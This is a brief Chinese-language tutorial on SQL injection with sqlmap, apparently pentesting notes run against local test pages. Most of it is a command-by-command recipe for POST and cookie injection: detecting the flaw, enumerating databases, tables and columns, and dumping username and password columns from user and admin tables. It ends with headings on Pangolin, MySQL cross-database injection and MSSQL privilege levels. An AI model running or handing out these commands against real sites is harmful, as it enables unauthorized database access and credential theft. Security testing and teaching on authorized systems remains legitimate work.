Sqlmap特点:适合多种数据库
Python下载地址:http://www.newasp.net/soft/63733.html
Sqlmap下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master
Sqlmap post,cookie注入
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" //判断注入(一直按enter)
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --dbs //猜解数据库名
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --tables //猜解表名
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --tables -D "fanke" ///猜解fanke数据库下的表名
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --columns -T "user" //猜解fanke数据库下的表名user中的列名
sqlmap.py -u http://127.0.0.1:88/p.php --data "u=admin&p=123456" --dump -C “username,password” -T user //猜解数据
Sqlmap coookie注入实例
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2
//判断是否存在cookie注入
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --tables //猜解表名
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --columns -T admin //猜解admin表名下的列名
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C "username,password" -T admin //获取指定列名admin下的数据
穿山甲Post注入
穿山甲cookie注入
Mysql 跨库注入
条件:root权限 跨数据库查询
Mssql注入
Sa:最高权限 文件管理,数据库管理,命令执行,注册表管理等
Db:一般权限 文件操作,数据库
Public:最低权限 数据库